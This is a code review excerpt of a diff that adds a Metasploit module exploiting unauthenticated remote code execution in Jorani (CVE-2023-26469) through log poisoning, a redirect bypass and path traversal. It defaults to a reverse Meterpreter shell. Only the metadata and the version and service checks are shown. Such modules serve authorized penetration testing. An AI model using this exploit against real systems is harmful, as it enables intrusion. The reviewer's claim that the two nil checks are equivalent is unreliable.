modules/exploits/multi/php/jorani_path_trav.rb

```diff
@@ -0,0 +1,171 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Jorani unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits an unauthenticated Remote Code Execution in Jorani prior to 1.0.2.
+          It abuses 3 vulnerabilities: log poisoning and redirection bypass via header spoofing, then it uses path traversal to trigger the vulnerability.
+          It has been tested on Jorani 1.0.0.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'RIOUX Guilhem (jrjgjk)'
+        ],
+        'References' => [
+          ['CVE', '2023-26469'],
+          ['URL', 'https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py']
+        ],
+        'Platform' => %w[php],
+        'Arch' => ARCH_PHP,
+        'Targets' => [
+          ['Jorani < 1.0.2', {}]
+        ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'DisclosureDate' => '2023-01-06',
+        'Privileged' => false,
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path of Jorani', '/'])
+      ]
+    )
+  end
+
+  def get_version(res)
+    matches = res.body.scan(/&nbsp;v([0-9.]+)&nbsp;&copy;/i)
+    if matches.nil? || matches[0].nil?
+      print_error('Cannot recovered Jorani version...')
+      return nil
+    end
+    matches[0][0]
+  end
+
+  def service_running(res)
+    matches = res.body.scan(/Leave Management System/)
+    if matches[0].nil?
```

Comment:
```suggestion
    if matches.nil?
```
This makes more sense to me, though it is the equivalent to `matches[0]`